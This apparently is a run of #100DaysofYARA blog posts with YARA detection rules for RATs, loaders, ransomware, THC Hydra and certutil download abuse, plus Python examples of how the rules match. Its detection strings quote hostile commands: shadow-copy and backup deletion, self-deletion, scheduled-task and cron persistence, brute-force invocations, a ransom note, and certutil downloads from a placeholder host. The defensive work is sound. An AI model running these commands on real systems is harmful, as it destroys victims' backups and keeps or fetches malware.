#100DaysofYARA 2024 – Day 61 – SystemBC (Linux)

The SystemBC RAT/proxy also has a Linux variant; today’s rule uses strings to match that one too.

rule MAL_SystemBC_Lin_strings {
	meta:
		description = "Matches strings found in SystemBC malware Linux samples."
		last_modified = "2024-03-01"
		author = "@petermstewart"
		DaysofYara = "61/100"
		sha256 = "cf831d33e7ccbbdc4ec5efca43e28c6a6a274348bb7bac5adcfee6e448a512d9"
		sha256 = "b68bfd96f2690058414aaeb7d418f376afe5ba65d18ee4441398807b06d520fd"

	strings:
		$a1 = "Rc4_crypt" fullword
		$a2 = "newConnection" fullword
		$a3 = "/tmp/socks5.sh" fullword
		$a4 = "cat <(echo '@reboot echo" fullword
		$a5 = "socks5_backconnect" fullword

	condition:
		uint32(0) == 0x464c457f and
		2 of them
}

Find the rest of my 100DaysofYARA posts here, and the rules themselves on my Github repository.

#100DaysofYARA 2024 – Day 60 – SystemBC (Windows)

SystemBC is a persistent backdoor which allows its operators to execute commands, but also to proxy network traffic via SOCKS5 or Tor. Today’s rule matches strings found in Windows SystemBC samples.

rule MAL_SystemBC_Win_strings {
	meta:
		description = "Matches strings found in SystemBC malware Windows samples."
		last_modified = "2024-02-29"
		author = "@petermstewart"
		DaysofYara = "60/100"
		sha256 = "876c2b332d0534704447ab5f04d0eb20ff1c150fd60993ec70812c2c2cad3e6a"
		sha256 = "b9d6bf45d5a7fefc79dd567d836474167d97988fc77179a2c7a57f29944550ba"

	strings:
		$a1 = "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
		$a2 = "GET %s HTTP/1.0"
		$a3 = "Host: %s"
		$a4 = "Connection: close"
		$b1 = "BEGINDATA"
		$b2 = "HOST1:"
		$b3 = "HOST2:"
		$b4 = "PORT1:"
		$b5 = "DNS:"
		$b6 = "-WindowStyle Hidden -ep bypass -file"

	condition:
		uint16(0) == 0x5a4d and
		// "and" binds tighter than "or" in YARA, so the MZ check must wrap both branches
		(all of ($a*) or 5 of ($b*))
}

#100DaysofYARA 2024 – Day 59 – DarkComet RAT

The original DarkComet RAT was first developed in 2008 and is still widely used today by, basically, everyone.

rule MAL_DarkComet_strings {
	meta:
		description = "Matches strings found in DarkComet malware samples."
		last_modified = "2024-02-28"
		author = "@petermstewart"
		DaysofYara = "59/100"
		sha256 = "3e10c254d6536cc63d286b53abfebbf53785e6509ae9fb569920747d379936f6"

	strings:
		$a1 = "I wasn't able to open the hosts file, maybe because UAC is enabled in remote computer!"
		$a2 = "BTRESULTPing|Respond [OK] for the ping !|"
		$a3 = "BTRESULTClose Server|close command receive, bye bye...|"
		$a4 = "BTRESULTHTTP Flood|Http Flood task finished!|"
		$a5 = "BTRESULTMass Download|Downloading File...|"
		$a6 = "ERR|Cannot listen to port, try another one..|"

	condition:
		uint16(0) == 0x5a4d and
		all of them
}

#100DaysofYARA 2024 – Day 58 – Netwire RAT

Netwire is another commodity RAT most often seen in high-volume opportunistic campaigns, but occasionally used as part of targeted operations, such as this one targeting Pakistani government organisations.

rule MAL_Netwire_strings {
	meta:
		description = "Matches strings found in NetWire malware samples."
		last_modified = "2024-02-27"
		author = "@petermstewart"
		DaysofYara = "58/100"
		sha256 = "05a36b671efa242764695140c004dfff3e0ff9d11df5d74005b7c1c8c53d8f00"
		sha256 = "d2a60c0cb4dd0c53c48bc062ca754d94df400dee9b672cf8881f5a1eff5b4fbe"

	strings:
		$ua = "User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
		$a1 = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
		$a2 = "Accept-Language: en-US,en;q=0.8"
		$a3 = "GET %s HTTP/1.1" 
		$b1 = "ping 192.0.2.2 -n 1 -w %d >nul 2>&1"
		$b2 = "DEL /s \"%s\" >nul 2>&1"
		$b3 = "call :deleteSelf&exit /b"
		$b4 = ":deleteSelf"
		$b5 = "start /b \"\" cmd /c del \"%%~f0\"&exit /b"
		$b6 = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders"
		$c1 = "%6\\EWWnid\\PI0Wld\\u6d0 aC5C\\ad8CQi5\\mWn4R aC5C"
		$c2 = "%6\\PI0Wl4Ql\\u6d0 aC5C\\ad8CQi5\\mWn4R aC5C"
		$c3 = "%6\\PWlWSW\\a0CnWR\\u6d0 aC5C\\ad8CQi5\\mWn4R aC5C"
		$c4 = "%6\\vCRSdf\\vCRSdfc0Wg6d0\\u6d0 aC5C\\ad8CQi5\\mWn4R aC5C"
		$c5 = "%6\\Tsd0C MW85gC0d\\Tsd0C M5CVid\\mWn4R aC5C"

	condition:
		uint16(0) == 0x5a4d and
		12 of them
}

#100DaysofYARA 2024 – Day 57 – PrivateLoader

PrivateLoader is a downloader malware family whose primary purpose is to download and execute additional malware. Intel 471 and Walmart reported on PrivateLoader’s pay-per-install (PPI) service that distributes malware on behalf of other threat actors. The malware payloads can be selectively delivered to victims based on certain criteria (e.g. location, cryptocurrency or financial activity, on a corporate network, specific software installed, etc.) As previously reported, some of the payloads being distributed include Redline Stealer, Vidar Stealer, SmokeLoader, Stop ransomware, and other commodity malware.

Peeking into PrivateLoader, Zscaler

This rule matches PrivateLoader samples found on vx-underground:

rule MAL_PrivateLoader_strings {
	meta:
		description = "Matches strings found in PrivateLoader malware samples."
		last_modified = "2024-02-26"
		author = "@petermstewart"
		DaysofYara = "57/100"
		sha256 = "077225467638a420cf29fb9b3f0241416dcb9ed5d4ba32fdcf2bf28f095740bb"
		sha256 = "27c1ed01c767f504642801a7e7a7de8d87dbc87dee88fbc5f6adb99f069afde4"

	strings:
		$ua = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" ascii wide
		$b1 = ".?AVBase@Rijndael@CryptoPP@@" ascii
		$b2 = ".?AVCannotFlush@CryptoPP@@" ascii
		$b3 = ".?AVBase64Decoder@CryptoPP@@" ascii
		$b4 = ".?AVCBC_Encryption@CryptoPP@@" ascii
		$b5 = "Cleaner" ascii
		$c1 = "Content-Type: application/x-www-form-urlencoded" wide
		$c2 = "https://ipinfo.io/" wide
		$c3 = "https://db-ip.com/" wide
		$c4 = "https://www.maxmind.com/en/locate-my-ip-address" wide
		$c5 = "https://ipgeolocation.io/" wide

	condition:
		uint16(0) == 0x5a4d and
		// parenthesised so the MZ check guards every branch ("and" binds tighter than "or")
		(
			($ua and 4 of them) or
			all of ($b*) or
			all of ($c*)
		)
}

#100DaysofYARA 2024 – Day 56 – “no virus.exe” Ransomware

Today’s rule is inspired by MalwareHunterTeam tweeting about an unidentified (by me at least) ransomware sample dropping a note named read_it.txt, uploaded to VirusTotal with the filename “no virus.exe”. Seems legit.

rule MAL_NoVirus_strings {
	meta:
		description = "Matches strings found in ransomware sample uploaded to VirusTotal with filename 'no virus.exe'."
		last_modified = "2024-02-25"
		author = "@petermstewart"
		DaysofYara = "56/100"
		sha256 = "015e546f3ac1350c5b68fedc89e16334a4e456092228e691f054c1a86fefb6c6"
		ref = "https://twitter.com/malwrhunterteam/status/1745182178474885199"

	strings:
		$a1 = "vssadmin delete shadows /all /quiet & wmic shadowcopy delete" wide
		$a2 = "bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no" wide
		$a3 = "wbadmin delete catalog -quiet" wide
		$b1 = "read_it.txt" wide
		$b2 = "(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})" wide
		$c1 = "Don't worry, you can return all your files!" wide
		$c2 = "All your files like documents, photos, databases and other important are encrypted" wide
		$c3 = "You must follow these steps To decrypt your files" wide
		$c4 = "1) CONTACT US Telegram @CryptoKeeper_Support" wide
		$c5 = "2) Obtain Bitcoin (You have to pay for decryption in Bitcoins." wide
		$c6 = "After payment we will send you the tool that will decrypt all your files.)" wide
		$c7 = "3) Send 500$ worth of btc to the next address:" wide
		$c8 = "17Ym1FfiuXGGWr1SN6enUEEZUwnsuNMUDa" wide

	condition:
		uint16(0) == 0x5a4d and
		8 of them
}

This sample also matched my TTP_contains_BTC_address and HUNT_Ransomware_generic_strings rules, which was nice to see.

#100DaysofYARA 2024 – Day 55 – THC Hydra

Two rules today, both focusing on the Hydra network scanner maintained by The Hacker’s Choice. This probably isn’t a terribly relevant rule for actual threat hunting or detections, but seemed appropriate given yesterday’s vote in the Bundestag.

The first rule matches strings found in the Windows and Linux binaries:

rule PUP_THCHydra_strings {
    meta:
        description = "Matches strings found in the THC-Hydra network scanner."
        last_modified = "2024-02-24"
        author = "@petermstewart"
        DaysofYara = "55/100"
        ref = "https://github.com/vanhauser-thc/thc-hydra"
        ref = "https://github.com/maaaaz/thc-hydra-windows"

    strings:
        $a1 = "hydra -P pass.txt target cisco-enable  (direct console access)"
        $a2 = "hydra -P pass.txt -m cisco target cisco-enable  (Logon password cisco)"
        $a3 = "hydra -l foo -m bar -P pass.txt target cisco-enable  (AAA Login foo, password bar)"
        $a4 = "hydra -L urllist.txt -s 3128 target.com http-proxy-urlenum user:pass"
        $a5 = "hydra -L urllist.txt http-proxy-urlenum://target.com:3128/user:pass"
        $a6 = "USER hydra%d hydra %s :hydra"
        $a7 = "hydra rdp://192.168.0.1/firstdomainname -l john -p doe"
        $a8 = "User-Agent: Mozilla/4.0 (Hydra)"

    condition:
        (uint16(0) == 0x5a4d or uint32(0) == 0x464c457f) and
        all of them
}

The second rule works a bit differently and matches the default icon packaged into the Windows binary release. To be honest this one was mostly an excuse to use the YARA hash module.

import "pe"
import "hash"

rule PUP_THCHydra_default_icon {
    meta:
        description = "Matches the default icon resource section hash found in Windows THC-Hydra network scanner binaries."
        last_modified = "2024-02-24"
        author = "@petermstewart"
        DaysofYara = "55/100"
        sha256 = "ee43a7be375ae2203b635c569652f182f381b426f80430ee495aa6a96f37b4e6"
        ref = "https://github.com/maaaaz/thc-hydra-windows"

    condition:
        uint16(0) == 0x5a4d and
        for any resource in pe.resources:
        (
            hash.md5(resource.offset, resource.length) == "7835bdbf054e7ba813fa0203aa1c5e36"
        )
}

#100DaysofYARA 2024 – Day 54 – AsyncRAT Github Release

After writing my rule to match AsyncRAT samples available on vx-underground, I found that it did not match the release binaries available on the AsyncRAT Github repository. I haven’t looked too closely into why that is the case. I’m a threat hunter, not a reverse engineer – you might notice that my YARA rules tend to be reliant on the output of strings!

In any case, here is a new rule that does match the Github release binary:

rule MAL_AsyncRAT_Github_release {
	meta:
		description = "Matches strings found in AsyncRAT Github release."
		last_modified = "2024-02-23"
		author = "@petermstewart"
		DaysofYara = "54/100"
		sha256 = "06899071233d61009a64c726a4523aa13d81c2517a0486cc99ac5931837008e5"
		ref = "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp"
        
	strings:
		$a1 = "NYAN-x-CAT"
		$a2 = "This program is distributed for educational purposes only."
		$a3 = "namespace AsyncRAT"
		$b1 = "[!] If you wish to upgrade to new version of AsyncRAT, You will need to copy 'ServerCertificate.p12'." wide
		$b2 = "[!] If you lose\\delete 'ServerCertificate.p12' certificate you will NOT be able to control your clients, You will lose them all." wide
		$b3 = "AsyncRAT | Dot Net Editor" wide
		$b4 = "XMR Miner | AsyncRAT" wide
		$b5 = "SEND A NOTIFICATION WHEN CLIENT OPEN A SPECIFIC WINDOW" wide
		$b6 = "Popup UAC prompt?" wide
		$b7 = "AsyncRAT | Unistall" wide
		$b8 = "recovered passwords successfully @ ClientsFolder" wide
	
	condition:
		uint16(0) == 0x5a4d and
		// "and" binds tighter than "or" in YARA, so the MZ check must wrap both branches
		(all of ($a*) or 6 of ($b*))
}
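
YARA parses a condition of the form `uint16(0) == 0x5a4d and X or Y` as `(uint16(0) == 0x5a4d and X) or Y`, because `and` binds tighter than `or`. The following is an added example (not code from the original post) that models the two branches of the Day 54 rule in plain Python; the Day 60 SystemBC and Day 57 PrivateLoader conditions have the same shape, so the same reasoning applies to them. The buffers it scans are constructed, not real samples.

```python
# Added example (not from the original post): a pure-Python model of the
# Day 54 MAL_AsyncRAT_Github_release condition, showing why the header check
# needs its own parentheses. In YARA "and" binds tighter than "or", so
#   uint16(0) == 0x5a4d and all of ($a*) or 6 of ($b*)
# parses as (MZ and all $a) or (6 of $b): the second branch has no MZ guard.
import struct

A_ASCII = [b"NYAN-x-CAT",
           b"This program is distributed for educational purposes only.",
           b"namespace AsyncRAT"]
# "wide" strings match their UTF-16LE form, so encode six of the $b strings that way.
B_WIDE = [s.encode("utf-16-le") for s in (
    "AsyncRAT | Dot Net Editor", "XMR Miner | AsyncRAT",
    "SEND A NOTIFICATION WHEN CLIENT OPEN A SPECIFIC WINDOW",
    "Popup UAC prompt?", "AsyncRAT | Unistall",
    "recovered passwords successfully @ ClientsFolder")]

def is_mz(data: bytes) -> bool:
    """uint16(0) == 0x5a4d: little-endian read of the first two bytes, 'MZ'."""
    return len(data) >= 2 and struct.unpack_from("<H", data, 0)[0] == 0x5A4D

def count_of(data: bytes, patterns) -> int:
    """Models 'N of ($x*)': how many strings of the set occur in data."""
    return sum(1 for p in patterns if p in data)

def condition_unguarded(data: bytes) -> bool:
    """(MZ and all of $a) or 6 of $b: what YARA makes of the condition without parentheses."""
    return (is_mz(data) and count_of(data, A_ASCII) == len(A_ASCII)) or count_of(data, B_WIDE) >= 6

def condition_guarded(data: bytes) -> bool:
    """MZ and (all of $a or 6 of $b): the header check applies to both branches."""
    return is_mz(data) and (count_of(data, A_ASCII) == len(A_ASCII) or count_of(data, B_WIDE) >= 6)

# Constructed buffers, not real samples: an MZ-prefixed blob carrying the $b strings,
# and a text-only blob (think of a UTF-16 report or log) carrying the same strings.
PE_LIKE = b"MZ" + b"\x00" * 62 + b"\x00\x00".join(B_WIDE)
TEXT_ONLY = "report: ".encode("utf-16-le") + "\n".encode("utf-16-le").join(B_WIDE)

if __name__ == "__main__":
    for name, buf in (("PE_LIKE", PE_LIKE), ("TEXT_ONLY", TEXT_ONLY)):
        print(name, condition_unguarded(buf), condition_guarded(buf))
```

The text-only buffer satisfies the unguarded form but not the guarded one, which is the false positive the parentheses remove.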

#100DaysofYARA 2024 – Day 53 – AsyncRAT

AsyncRAT is a popular commodity trojan often used as a credential stealer or loader for further malware. This rule matches strings found in AsyncRAT samples downloaded from vx-underground.

rule MAL_AsyncRAT_strings {
	meta:
		description = "Matches strings found in AsyncRAT samples."
		last_modified = "2024-02-22"
		author = "@petermstewart"
		DaysofYara = "53/100"
		sha256 = "00cdee79a9afc1bf239675ba0dc1850da9e4bf9a994bb61d0ec22c9fdd3aa36f"
		sha256 = "774e4d4af9175367bc3c7e08f4765778c58f1c66b46df88484a6aa829726f570"

	strings:
		$a1 = "/c schtasks /create /f /sc onlogon /rl highest /tn" wide
		$a2 = "\\nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS" wide
		$a3 = "bat.exe" wide
		$a4 = "Stub.exe" wide

	condition:
		uint16(0) == 0x5a4d and
		all of them
}

#100DaysofYARA 2024 – Day 52 – Certutil Downloads

Just like Bitsadmin, certutil.exe is a default component of Windows and can be abused to download a file over HTTP. This rule attempts to find common certutil download commands.

rule TTP_Certutil_Download_command {
	meta:
		description = "Matches strings commonly found in certutil.exe download commands."
		last_modified = "2024-02-21"
		author = "@petermstewart"
		DaysofYara = "52/100"
		ref = "https://lolbas-project.github.io/lolbas/Binaries/Certutil/#download"

	strings:
		$a = "certutil" nocase ascii wide
		$b = "-urlcache" nocase ascii wide
		$c = "-split" nocase ascii wide
		$d = "http" nocase ascii wide

	condition:
		all of them
}
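
The `nocase ascii wide` modifiers on every string above are what let this rule hit a command line whether it sits in a plain text file or inside a UTF-16 encoded script. The following is an added example (not code from the original post) that models those modifiers in plain Python and runs the rule's four-token logic over constructed command lines; the URL and file names are placeholders.

```python
# Added example (not from the original post): a pure-Python model of how the
# Day 52 rule's "nocase ascii wide" strings match. In YARA, "ascii" matches the
# raw bytes, "wide" matches the UTF-16LE form (each character followed by a NUL),
# and "nocase" makes both case-insensitive.
import re

TOKENS = ["certutil", "-urlcache", "-split", "http"]

def _char_class(c: str) -> bytes:
    """One character of the pattern, case-insensitive for letters."""
    if c.isalpha():
        return b"[" + c.lower().encode() + c.upper().encode() + b"]"
    return re.escape(c.encode())

def nocase_ascii_wide_pattern(token: str) -> re.Pattern:
    """Build one bytes regex that covers the ascii and wide forms of token."""
    ascii_form = b"".join(_char_class(c) for c in token)
    wide_form = b"".join(_char_class(c) + b"\x00" for c in token)
    return re.compile(ascii_form + b"|" + wide_form)

PATTERNS = {t: nocase_ascii_wide_pattern(t) for t in TOKENS}

def rule_matches(data: bytes) -> bool:
    """'all of them': every token present in ascii or wide form, in any case."""
    return all(p.search(data) for p in PATTERNS.values())

# Constructed inputs (not real artefacts); example.invalid is a placeholder host.
SAMPLES = {
    "ascii_lower": b"certutil.exe -urlcache -split -f http://example.invalid/a.bin a.bin",
    "ascii_mixed": b"CertUtil -URLCache -Split -f HTTP://example.invalid/a.bin a.bin",
    "wide": "certutil -urlcache -split -f http://example.invalid/a.bin".encode("utf-16-le"),
    "benign": b"certutil -hashfile a.bin SHA256",
}

def scan_all() -> dict:
    """Apply the rule to every constructed sample and return name -> matched."""
    return {name: rule_matches(buf) for name, buf in SAMPLES.items()}

if __name__ == "__main__":
    for name, hit in scan_all().items():
        print(f"{name:12s} {hit}")
```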
